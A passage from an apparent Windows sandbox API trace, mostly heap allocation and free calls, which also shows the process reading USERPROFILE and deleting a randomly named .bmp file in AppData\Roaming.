dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa020 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f18 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0190.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa080 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.779] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.779] CloseHandle (hObject=0x268) returned 1 [0190.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.780] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0190.781] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0190.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0190.781] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0190.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0190.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0190.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.786] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0190.787] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.787] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.787] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.788] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0190.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/7sqV8uLS.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp", lpFilePart=0x8bedfc*="7sqV8uLS.bmp") returned 0x3a [0190.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0190.789] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7sqv8uls.bmp")) returned 0x2020 [0190.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e930fb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xb11a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d56f, ftLastWriteTime.dwLowDateTime=0xb11a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d56f, nFileSizeHigh=0x0, nFileSizeLow=0x552a, dwReserved0=0x869, dwReserved1=0x4, cFileName="7sqV8uLS.bmp", cAlternateFileName="")) returned 0xaa58e0 [0190.790] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7sqV8uLS.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7sqv8uls.bmp")) returned 1 [0190.791] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e930fb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xb11a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d56f, ftLastWriteTime.dwLowDateTime=0xb11a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d56f, nFileSizeHigh=0x0, nFileSizeLow=0x552a, dwReserved0=0x869, dwReserved1=0x4, cFileName="7sqV8uLS.bmp", cAlternateFileName="")) returned 0 [0190.791] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0190.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.791] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0190.792] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.792] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.792] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0190.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.793] RtlAllocateHeap 